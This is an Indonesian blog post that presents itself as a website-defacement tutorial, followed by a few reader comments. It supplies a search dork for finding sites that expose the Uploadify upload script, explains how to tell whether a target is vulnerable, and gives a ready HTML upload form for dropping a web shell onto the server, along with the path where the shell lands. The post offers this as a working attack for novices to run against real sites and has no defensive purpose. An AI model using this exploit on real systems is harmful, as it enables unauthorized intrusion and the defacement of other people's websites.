Nih Saya Saya Nge Share Tutorial Deface Dengan Uploadify :v .
Maaf Kalau Sudah Tau Exploit ini , Soalnya Nih Exploit Udah Lama
Biarkan Para Newbie Berkreasi :D
OK Langsung Aja Ke Tempat Perkara Kejadian .
Dork:
inurl:/uploadify/ intitle:index of ( Ini Cuman Dork Default , Kembangin Aja Sendiri Biar Dapat Banyak )
Kalau Udah Dapat Pake Exploit Di Bawah
Exploit: target/(path)/uploadify/uploadify.php
Kalau Webnya Tdk Ada Gambarnya (blank) Berarti Webnya Vulnerable
Kalau Udah Dapat Copy Dibawah Ini Langsung CSRF nya
CSRF :
<form
action="http://target.co.li/themes/zicepanel/components/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
Klau Sudah Di Upload , Klau Keluar Tanda 1 Berarti Berhasil , Tetapi Klau Blank . Cari Target Lain
Path Shell Yang Sudah Di Upload
www.target.com/shellkamu.php
Ok Sekian Dan Terima Kasih
Facebook : https://www.facebook.com/marselERROR
Forum : phantom-ghost.org
Fanspage : https://www.facebook.com/Ghosts.phtml
ada ss vuln nya?
BalasHapusklau vuln gan , itu web nggak ada tulisan sama sekali , atau tdk ada gambar :v , maaf gak naruhin gambar gan , soalnya jringan tdk mendukung gan . thanks
HapusOke gan
BalasHapus